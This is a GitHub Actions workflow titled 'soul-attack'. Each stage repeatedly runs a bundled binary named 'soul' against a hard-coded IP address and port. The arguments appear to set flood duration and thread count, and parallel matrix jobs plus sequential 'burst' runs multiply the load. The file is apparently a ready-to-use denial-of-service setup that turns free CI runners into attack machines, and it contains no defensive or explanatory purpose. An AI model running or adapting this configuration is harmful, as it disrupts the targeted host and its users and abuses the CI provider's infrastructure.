name: soul-attack

on:
  push:

jobs:

  stage-0:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5]
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x soul
      - run: ./soul 20.235.143.62 15798 10 400

  stage-1:
    needs: stage-0
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5]
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x soul
      - run: ./soul 20.235.143.62 15798 120 400

  stage-2-calc:
    runs-on: ubuntu-22.04
    outputs:
      matrix_list: ${{ steps.calc.outputs.matrix_list }}
    steps:
      - name: Install jq
        run: sudo apt-get update && sudo apt-get install -y jq

      - id: calc
        run: |
          NUM_JOBS=$((120 / 10))
          if [ "$NUM_JOBS" -lt 1 ]; then
            NUM_JOBS=1
          fi
          MATRIX=$(seq 1 $NUM_JOBS | jq -R . | jq -cs .)
          echo "matrix_list=$MATRIX" >> "$GITHUB_OUTPUT"

  stage-2-sequential:
    needs: [stage-0, stage-2-calc]
    runs-on: ubuntu-22.04
    strategy:
      max-parallel: 1
      matrix:
        iteration: ${{ fromJson(needs.stage-2-calc.outputs.matrix_list) }}
    steps:
      - uses: actions/checkout@v3
      - name: Sequential 10s Burst
        run: |
          chmod +x soul
          ./soul 20.235.143.62 15798 10 400
